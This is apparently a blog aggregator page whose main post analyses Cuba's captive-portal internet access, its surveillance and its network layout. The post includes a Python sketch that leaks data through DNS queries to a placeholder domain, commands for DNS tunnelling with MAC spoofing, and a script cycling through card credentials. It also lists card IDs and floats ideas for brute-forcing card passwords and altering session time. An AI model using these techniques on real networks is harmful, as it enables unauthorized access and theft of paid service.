Now, to turn this into bills and actual accounting, well... it's really much more complicated. To make a long story short, it works, but I really had to pull my hair out and ended up making yet another git repository to demonstrate how it could work. I am now stuck at the step of actually generating bills automatically, which seems to be a total pain. The examples and documentation I found were limited, and while I feel that some people are actively doing this, they have yet to reveal their magic sauce in a meaningful way. I was told on IRC that no one has actually achieved converting timeclock.el entries directly into bills...

Kodi

I made a small patch to the rom collection browser to turn off an annoying "OK" dialog that would block the import of ROMs. This actually was way more involved than expected, considering the size of the patch: I had to export the project to GitHub, since the original repository at Google Code is now archived, just like all Google Code repositories. I hope someone will pick it up from there.

Sopel

I have finally gotten my small patch for SNI support merged into Sopel! It turns out they are phasing out their own web module in favor of Requests, something that was refused last year. It seems the Sopel developers finally saw the interest in avoiding the maintenance cost of their own complete HTTP library... in an IRC bot.

Working on this patch, I filed a bug in requests which was promptly fixed.

Feed2tweet and spigot

I already mentioned how I linked this blog to Twitter through the use of feed2tweet. Since then, some of my pull requests and issues were merged, and others are still pending.

In the meantime, I figured it would make sense to also post to identi.ca. This turned out to be surprisingly difficult: the only bridge available would not work very well for me. I also filed a bunch of issues in the hope things would stabilize, but so far I have not made this work properly.

It seems to me that all of this stuff is really just reinventing the wheel. There are pretty neat IM libraries out there; one that is actively developed is libturpial, used in the Turpial client. It currently only supports status.net and Twitter, but if Pump.io support were implemented, it would solve all of the above problems at once...

Git-mediawiki

Did I mention how awesome the git-mediawiki remote is? It allows me to clone MediaWiki wikis and transparently read and write to them using the usual git commands! I use it to keep a mirror of the amateur radio wiki site, for example, as it makes no sense to me for this site not to be available offline. I was trying to mirror Wikivoyage and it would block at 500 pages, so I made a patch to support larger wikis.

Borg resignation

Finally, it is with great sadness that I announce that I have left the Borg backup project. It seems that my views of release and project management are irreconcilable with those of the maintainer of the Attic fork. Those looking for more details and explanations are welcome to look in the issue tracker for the various discussions regarding i18n, the support timeframe and compatibility policy, or to contact me personally.

Catégories: External Blogs

Internet in Cuba

Anarcat - lun, 01/25/2016 - 14:50

A lot has been written about the Internet in Cuba over the years. I have read a few articles, from the New York Times' happy support for Google's invasion of Cuba to RSF's dramatic and fairly outdated report about censorship in Cuba. Having written before about Internet censorship in Tunisia, I was curious to see if I could get a feel for what it is like over there, now that a new Castro is in power and the Obama administration has started restoring diplomatic ties with Cuba. With those political changes signifying the end of an embargo that has been called genocidal by the Cuban government, it is surprisingly difficult to get fresh information about the current state of affairs.

This article aims to fill that gap by clarifying how the internet works in Cuba, what kind of censorship mechanisms are in place and how to work around them. It also digs more technically into the network architecture and performance. It is published in the hope of providing both Cubans and the rest of the world with a better understanding of the network and, if possible, giving Cubans ways to access the internet more cheaply or without censorship.

"Censorship" and workarounds

Unfortunately, I have been connected to the internet only through the Varadero airport and the WiFi of an all-inclusive resort near Jibacoa. I have come to assume that this network is likely to be on a segregated, uncensored internet, while the rest of the country suffers the wrath of the Internet censorship in Cuba I have seen documented elsewhere.

Through my research, I couldn't find any sort of direct censorship. The Netalyzr tool couldn't find anything significantly wrong with the connection, other than the obvious performance problems related to the overloaded uplinks of the Cuban internet. I ran an incomplete OONI probe as well, and it seems there was no obvious censorship detected there either, at least according to folks in the helpful #ooni IRC channel. Tor also works fine, and could be a great way to avoid the global surveillance system described later in this article.

Nevertheless, it still remains to be seen how the internet is censored in the "real" Cuban internet, outside of the tourist designated areas - hopefully future visitors or locals can expand on this using the tools mentioned above, using the regular internet.

Usual care should be taken when using any workaround tools, mentioned in this post or not, as regimes around the world have accused, detained, tortured and sometimes killed people for the mere fact of using or distributing circumvention tools. For example, a Russian developer was arrested and detained in 2001 by the United States' FBI for exposing vulnerabilities in the Adobe e-books copy protection mechanisms. Similarly, people distributing Tor and other tools were arrested during the period prior to the revolution in Tunisia.

The Cuban captive portal

There is, however, a more pernicious and yet very obvious censorship mechanism at work in Cuba: to get access to the internet, you have to go through what seems to be a state-wide captive portal, which I have seen both at the hotel and at the airport. It is presumably deployed at all internet access points.

To get credentials for that portal, you need a username and password, which you get by buying a Nauta card. Those cards cost 2$CUC and get you an hour of basically unlimited internet access. That may not seem like a lot for a rich northern hotel party-goer, but for Cubans it's a lot of money, given that the average monthly salary is around 20$CUC: a single hour online costs a tenth of a month's pay. The system is also pretty annoying to use, because it means you do not get continuous network access: every hour, you need to input a new card, which will obviously make streaming movies and other online activities annoying. It also makes hosting servers basically impossible.

So while Cuba does not have, like China or Iran, a "great firewall", there is definitely a big restriction to going online in Cuba. Indeed, it seems to be how the government ensures that Cubans do not foment too much dissent online: keep the internet slow and inaccessible, and you won't get too many Arab spring / blogger revolutions.

Bypassing the Cuban captive portal

The good news is that it is perfectly possible for Cubans (or at least for a tourist like me with resources outside of the country) to bypass the captive portal. Like many poorly implemented portals, this one allows DNS traffic to go through, which makes it possible to access the global network for free by using a tool like iodine, which tunnels IP traffic over DNS requests.
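To illustrate the principle (iodine itself is much more elaborate, encoding full bidirectional IP traffic in NULL or TXT records), here is a toy Python sketch of how arbitrary data can already leak out through DNS alone. The domain t.example.com is hypothetical; a real tunnel operator would run the authoritative name server for it and decode the labels on the other side:

    import base64
    import socket

    def dns_smuggle(data, domain="t.example.com"):
        """Leak `data` through the portal's recursive DNS resolver."""
        # base32 is DNS-safe (case-insensitive alphanumerics); drop padding
        label = base64.b32encode(data).decode("ascii").rstrip("=").lower()
        # DNS labels are limited to 63 bytes each, so chunk the payload
        chunks = [label[i:i + 63] for i in range(0, len(label), 63)]
        name = ".".join(chunks) + "." + domain
        try:
            socket.gethostbyname(name)  # the query itself carries the data
        except socket.gaierror:
            pass  # a failed lookup is fine: the query already went out

    dns_smuggle(b"hello from behind the portal")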

Of course, the bandwidth and reliability of the connection you get through such a tunnel are pretty bad. I have regularly seen 80% packet loss and over two minutes of latency:

    --- 10.0.0.1 ping statistics ---
    163 packets transmitted, 31 received, 80% packet loss, time 162391ms
    rtt min/avg/max/mdev = 133.700/2669.535/64188.027/11257.336 ms, pipe 65

Still, it allowed me to log in to my home server through SSH, using Mosh to work around the reliability issues.

Every once in a while, mosh would get stuck and keep on trying to send packets to probe the server, which would clog the connection even more. So I regularly had to restart the whole stack using these commands:

    killall iodine          # stop DNS tunnel
    nmcli n off             # turn off wifi to change MAC address
    macchanger -A wlan0     # change MAC address
    nmcli n on              # turn wifi back on
    sleep 3                 # wait for wifi to settle
    iodine-client-start     # restart DNS tunnel

The Koumbit Wiki has good instructions on how to setup a DNS tunnel. I am wondering if such a public service could be of use for Cubans, although I am not sure how it could be deployed only for Cubans, and what kind of traffic it could support... The fact is that iodine does require a server to operate, and that server must be run on the outside of the censored perimeter, something that Cubans may not be able to afford in the first place.

Another possible way to save money with the captive portal would be to write something that automates connecting and disconnecting from the portal. You would feed that program a list of credentials and it would connect to the portal only on demand, and disconnect as soon as no traffic goes through. There are details on the implementation of the captive portal below that may help future endeavours in that field.
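A rough sketch of what such a tool could look like, based on the endpoints documented in the "Captive portal implementation" section below. To be clear, this is untested: the form field names and the placeholder card passwords are assumptions for illustration, not a working client.

    import time
    import requests

    PORTAL = "https://www.portal-wifi-temas.nauta.cu"
    LOGOUT = "http://192.168.134.138/logout.user?cmd=logout"

    def login(username, password):
        # verify=False because the portal uses a self-signed certificate;
        # the field names here are guesses based on the observed login URL
        requests.post(PORTAL + "/index.php?r=ac/login",
                      data={"username": username, "password": password},
                      verify=False)

    def logout():
        requests.get(LOGOUT, verify=False)

    # hypothetical list of Nauta card credentials
    cards = [("151003576287", "000000000000"),
             ("151003576105", "000000000000")]

    username, password = cards.pop(0)
    login(username, password)
    try:
        time.sleep(3600)  # or better: watch for idle traffic and stop early
    finally:
        logout()          # stop the meter as soon as we are done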

Private information revealed to the captive portal

It should be mentioned, however, that the captive portal has a significant amount of information on clients, which is a direct threat to the online privacy of Cuban internet users. Of course the unique identifiers issued with the Nauta cards can be correlated with your identity, right from the start. For example, I had to give my room number to get a Nauta card issued.

Then the central portal also knows which access point you are connected to. For example, the portal knew I was connected to Wifi_Memories_Jibacoa, which, for anyone who cares to research, gives a location of about 20 square meters where I was located when connected (there is only one access point in the whole hotel).

Finally, the central portal also knows my MAC address, a unique identifier for the computer I am using which also reveals which brand of computer I am using (Mac, Lenovo, etc). While this address can be changed, very few people know that, let alone how.

This led me to question whether I would be allowed back in Cuba (or even allowed out!) after publishing this blog post, as it is obvious that I can be easily identified based on the time this article was published, my name and other details. Hopefully the Cuban government will either not notice or not care, but this can be a tricky situation, obviously. I have heard that Cuban prisons are not the best hangout place in Cuba, to say the least...

Network configuration assessment

This section is more technical and delves more deeply into the Cuban internet, analyzing the quality and topology of the network, along with hints as to which hardware and providers are being used to support the Cuban government.

Line quality

The internet is actually not so bad in the hotel. Again, this may be because of the very fact that I am in that hotel, and I get privileged access to the new fiber line to Venezuela, the ALBA-1 link.

The line speed I get is around 1 Mbps, according to speedtest, which selected a server from LIME in George Town, Cayman Islands:

    [1034]anarcat@angela:cuba$ speedtest
    Retrieving speedtest.net configuration...
    Retrieving speedtest.net server list...
    Testing from Empresa de Telecomunicaciones de Cuba (152.206.92.146)...
    Selecting best server based on latency...
    Hosted by LIME (George Town) [391.78 km]: 317.546 ms
    Testing download speed........................................
    Download: 1.01 Mbits/s
    Testing upload speed..................................................
    Upload: 1.00 Mbits/s

Latency to the rest of the world is of course slow:

    --- koumbit.org ping statistics ---
    122 packets transmitted, 120 received, 1,64% packet loss, time 18731,6ms
    rtt min/avg/max/sdev = 127,457/156,097/725,211/94,688 ms

    --- google.com ping statistics ---
    122 packets transmitted, 121 received, 0,82% packet loss, time 19371,4ms
    rtt min/avg/max/sdev = 132,517/160,095/724,971/93,273 ms

    --- redcta.org.ar ping statistics ---
    122 packets transmitted, 120 received, 1,64% packet loss, time 40748,6ms
    rtt min/avg/max/sdev = 303,035/339,572/965,092/97,503 ms

    --- ccc.de ping statistics ---
    122 packets transmitted, 72 received, 40,98% packet loss, time 19560,2ms
    rtt min/avg/max/sdev = 244,266/271,670/594,104/61,933 ms

Interestingly, Koumbit is actually the closest host in the above test. It could be that Canadian hosts are less affected by bandwidth problems compared to US hosts because of the embargo.

Network topology

The various traceroutes show a fairly odd network topology, but that is typical of what I would describe as "colonized internet users", who sit behind layers and layers of NAT and obscure routing that keep them from the real internet. Just like large corporations implementing NAT on a large scale, Cuba seems to have layers and layers of private RFC 1918 IPv4 space. A typical traceroute starts with:

    traceroute to koumbit.net (199.58.80.33), 30 hops max, 60 byte packets
     1  10.156.41.1 (10.156.41.1)  9.724 ms  9.472 ms  9.405 ms
     2  192.168.134.137 (192.168.134.137)  16.089 ms  15.612 ms  15.509 ms
     3  172.31.252.113 (172.31.252.113)  15.350 ms  15.805 ms  15.358 ms
     4  pos6-0-0-agu-cr-1.mpls.enet.cu (172.31.253.197)  15.286 ms  14.832 ms  14.405 ms
     5  172.31.252.29 (172.31.252.29)  13.734 ms  13.685 ms  14.485 ms
     6  200.0.16.130 (200.0.16.130)  14.428 ms  11.393 ms  10.977 ms
     7  200.0.16.74 (200.0.16.74)  10.738 ms  10.019 ms  10.326 ms
     8  ix-11-3-1-0.tcore1.TNK-Toronto.as6453.net (64.86.33.45)  108.577 ms  108.449 ms

Let's take this apart line by line:

     1  10.156.41.1 (10.156.41.1)  9.724 ms  9.472 ms  9.405 ms

This is my local gateway, probably the hotel's wifi router.

     2  192.168.134.137 (192.168.134.137)  16.089 ms  15.612 ms  15.509 ms

This is likely not very far from the local gateway, probably still in Cuba. It is numerically adjacent to the captive portal IP address (see below), so it is very likely related to the captive portal implementation.

     3  172.31.252.113 (172.31.252.113)  15.350 ms  15.805 ms  15.358 ms
     4  pos6-0-0-agu-cr-1.mpls.enet.cu (172.31.253.197)  15.286 ms  14.832 ms  14.405 ms
     5  172.31.252.29 (172.31.252.29)  13.734 ms  13.685 ms  14.485 ms

All those are within RFC 1918 space. Interestingly, the Cuban DNS servers resolve one of those private IPs to a name within Cuban space, on line #4. That line is interesting because it reveals the potential use of MPLS.

     6  200.0.16.130 (200.0.16.130)  14.428 ms  11.393 ms  10.977 ms
     7  200.0.16.74 (200.0.16.74)  10.738 ms  10.019 ms  10.326 ms

Those two lines are the only ones that actually reveal that the route belongs in Cuba at all. Both IPs are in a tiny (/24, or 256 IP addresses) network allocated to ETECSA, the state telco in Cuba:

    inetnum:     200.0.16/24
    status:      allocated
    aut-num:     N/A
    owner:       EMPRESA DE TELECOMUNICACIONES DE CUBA S.A. (IXP CUBA)
    ownerid:     CU-CUBA-LACNIC
    responsible: Rafael López Guerra
    address:     Ave. Independencia y 19 Mayo, s/n,
    address:     10600 - La Habana - CH
    country:     CU
    phone:       +53 7 574242 []
    owner-c:     JOQ
    tech-c:      JOQ
    abuse-c:     JEM52
    inetrev:     200.0.16/24
    nserver:     NS1.NAP.ETECSA.NET
    nsstat:      20160123 AA
    nslastaa:    20160123
    nserver:     NS2.NAP.ETECSA.NET
    nsstat:      20160123 AA
    nslastaa:    20160123
    created:     20030512
    changed:     20140610

Then the last hop:

     8  ix-11-3-1-0.tcore1.TNK-Toronto.as6453.net (64.86.33.45)  108.577 ms  108.449 ms  108.257 ms

...interestingly, lands directly in Toronto, in this case going on to Koumbit. That is the first hop that varies according to the destination, hops 1-7 being a common trunk for all external communications. It's also interesting that this hop adds a good 90 milliseconds of extra latency, showing that a significant distance and amount of equipment is crossed. Yet only a single hop appears, not showing the intermediate step of the Venezuelan link or any other links for that matter. Something obscure is going on there...
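Stepping back, the private/public split across that common trunk can be double-checked mechanically with Python's ipaddress module:

    import ipaddress

    # the hops observed in the traceroute above
    hops = ["10.156.41.1", "192.168.134.137", "172.31.252.113",
            "172.31.253.197", "172.31.252.29", "200.0.16.130",
            "200.0.16.74", "64.86.33.45"]
    for hop in hops:
        kind = "private" if ipaddress.ip_address(hop).is_private else "public"
        print(hop, kind)
    # hops 1-5 are all RFC 1918 space; 200.0.16.130 is the first public address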

Also interesting to note is the traceroute to the redirection host, which is only one hop away:

    traceroute to 192.168.134.138 (192.168.134.138), 30 hops max, 60 byte packets
     1  192.168.134.138 (192.168.134.138)  6.027 ms  5.698 ms  5.596 ms

Even though it is not the gateway:

    $ ip route
    default via 10.156.41.1 dev wlan0  proto static  metric 1024
    10.156.41.0/24 dev wlan0  proto kernel  scope link  src 10.156.41.4
    169.254.0.0/16 dev wlan0  scope link  metric 1000

This implies very close coordination between the different access points and the captive portal system. Finally, note that there seem to be only three peers to the Cuban internet: Teleglobe, formerly Canadian and now owned by the Indian Tata group, and Telefónica, the Spanish telco that colonized most of Latin America's internet, all the way down to Argentina. This is confirmed by my traceroutes, which show traffic to Koumbit going through Tata and Google's going through Telefónica.

Captive portal implementation

The captive portal is https://www.portal-wifi-temas.nauta.cu/ (not accessible outside of Cuba) and uses a self-signed certificate. The domain name resolves to 190.6.81.230 in the hotel.

Accessing http://1.1.1.1/ gives you a status page which allows you to disconnect from the portal. It actually redirects you to https://192.168.134.138/logout.user. That also uses a self-signed, but different, certificate. That certificate actually reveals the involvement of Gemtek, which is a "world-leading provider of Wireless Broadband solutions, offering a wide range of solutions from residential to business". It is somewhat unclear whether the involvement of Gemtek here is deliberate or a misconfiguration on the part of Cuban officials, especially since the certificate is self-signed and was issued in 2002. It could, however, be a trace of the supposed involvement of China in the development of Cuba's networking systems, although Gemtek is based in Taiwan, not in mainland China.
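For the record, the certificate is easy to retrieve for offline inspection with Python's standard library (this obviously only works from inside the portal's network):

    import ssl

    # fetch the certificate without validating it (it is self-signed anyway)
    pem = ssl.get_server_certificate(("192.168.134.138", 443))
    print(pem)  # pipe into "openssl x509 -noout -text" to read the details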

That IP, in turn, redirects you to the same portal, but to a page that shows you the statistics:

https://www.portal-wifi-temas.nauta.cu/?mac=0024D1717D18&script=logout.user&remain_time=00%3A55%3A52&session_time=00%3A04%3A08&username=151003576287&clientip=10.156.41.21&nasid=Wifi_Memories_Jibacoa&r=ac%2Fpopup

Notice how you see the MAC address of the machine in the URL (randomized; this is not my MAC address), along with the remaining time, session time, client IP and the WiFi access point ESSID. There may be some potential for defrauding the session time there; I haven't tested it directly.

Hitting Actualizar redirects you back to the IP address, which redirects you to the right URL on the portal. The "real" logout is at:

http://192.168.134.138/logout.user?cmd=logout

The login is performed against https://www.portal-wifi-temas.nauta.cu/index.php?r=ac/login with a referer of:

https://www.portal-wifi-temas.nauta.cu/?&nasid=Wifi_Memories_Jibacoa&nasip=192.168.134.138&clientip=10.156.41.21&mac=EC:55:F9:C5:F2:55&ourl=http%3a%2f%2fgoogle.ca%2f&sslport=443&lang=en-US%2cen%3bq%3d0.8&lanip=10.156.41.1

Again, notice the information revealed to the central portal.

Equipment and providers

I ran Nmap probes against both the captive portal and the redirection host, in the hope of finding out how they were built and if they could reveal the source of the equipment used.

The complete nmap probes are available in nmap, but it seems that the captive portal is running on some embedded device. It is confusing because the probe for the captive portal responds as if it were the gateway, which blurs even more the distinction between the hotel's gateway and the captive portal. This raises the distinct possibility that all access points are actually captive portals that authenticate against another central server.

The nmap traces do show three distinct hosts however:

  • the captive portal (www.portal-wifi-temas.nauta.cu, 190.6.81.230)
  • some redirection host (192.168.134.138)
  • the hotel's gateway (10.156.41.1)

They do have distinct signatures so the above may be just me misinterpreting traceroute and nmap results. Your comments may help in clarifying the above.

Still, the three devices show up as running Linux, in the two last cases versions between 2.4.21 and 2.4.31. Now, finding out which distribution of Linux they are running is way more challenging, and it is possible it is just some custom Linux build. Indeed, the webserver shows up as G4200.GSI.2.22.0155 and the SSH server is running OpenSSH 3.0.2p1, which is basically prehistoric (2002!), which corroborates the idea that this is some Gemtek embedded device.

The fact that those devices are running 14-year-old software should be a concern to the people responsible for those networks. There is, for example, a remote root vulnerability that affects that specific version of OpenSSH, among many other vulnerabilities.

A note on Nauta card's security

Finally, one can note that it is probably trivial to guess card UIDs. All cards I have here start with the prefix 15100, the following digits being 3576 or 4595, presumably depending on the "batch" that was sent to different hotels, which seem to come in batches of 1000 cards. You can also correlate the UID with the date at which the card was issued. For example, 151003576XXX cards are all valid until 19/03/2017, and 151004595XXX cards are all valid until 23/03/2017. Here's the list of UIDs I have seen:

    151004595313
    151004595974
    151003576287
    151003576105
    151003576097

The passwords, on the other hand, do seem fairly random (although my sample size is small). Interestingly, those passwords are also 12 digits long, which is about as strong as a seven-letter password (mixed uppercase and lowercase). If there are no rate-limiting provisions on that captive portal, it could be possible to brute-force those passwords, since you have free rein to access those routers. Depending on the performance of the routers, you could get lucky and find a working password for free...
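The back-of-the-envelope entropy comparison, for the skeptical:

    import math

    digits = math.log2(10 ** 12)   # 12-digit numeric password
    letters = math.log2(52 ** 7)   # 7 letters, mixed upper and lower case
    print("%.1f vs %.1f bits" % (digits, letters))  # 39.9 vs 39.9 bits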

Conclusion

Clearly, Internet access in Cuba needs to be modernized. Cuba is years behind the rest of the Americas, if only in the percentage of the population with internet access, or in download speeds. The existence of a centralized captive portal also creates a huge surveillance potential that should be a concern for any Cuban, or for that matter, anyone wishing to live in a free society.

The answer, however, lies not in the liberalization of commerce and opening the doors to US companies and their own systems of surveillance. It should be possible, and even desirable, for Cubans to establish their own neutral network, a proposal I have made in the past even for here in Québec. This network could be used and improved by Cubans themselves, prioritizing local communities that would establish their own infrastructure according to their own needs. I have been impressed by this article about the El Paquete system - it shows great innovation and initiative from Cubans, who are known for engaging with technology in a creative way. This should be leveraged by letting Cubans do what they want with their networks, not by telling them what to do.

The best the Googles of this world can do to help Cuba is not to colonize Cuba's technological landscape but to clean up their own, and to make their own tools more easily accessible and shareable offline. That is something companies can do right now, something I detailed in a previous article.

Catégories: External Blogs

Epic Lameness

Eric Dorland - lun, 09/01/2008 - 17:26
SF.net now supports OpenID. Hooray! I'd like to make a comment on a thread about the RTL8187se chip I've got in my new MSI Wind. So I go to sign in with OpenID and instead of signing me in it prompts me to create an account with a name, username and password for the account. Huh? I just want to post to their forum, I don't want to create an account (at least not explicitly, if they want to do it behind the scenes fine). Isn't the point of OpenID to not have to create accounts and particularly not have to create new usernames and passwords to access websites? I'm not impressed.
Catégories: External Blogs

Sentiment Sharing

Eric Dorland - lun, 08/11/2008 - 23:28
Biella, I am from there and I do agree. If I was still living there I would try to form a team and make a bid. Simon even made noises about organizing a bid at DebConfs past. I wish he would :)

But a DebConf in New York would be almost as good.
Catégories: External Blogs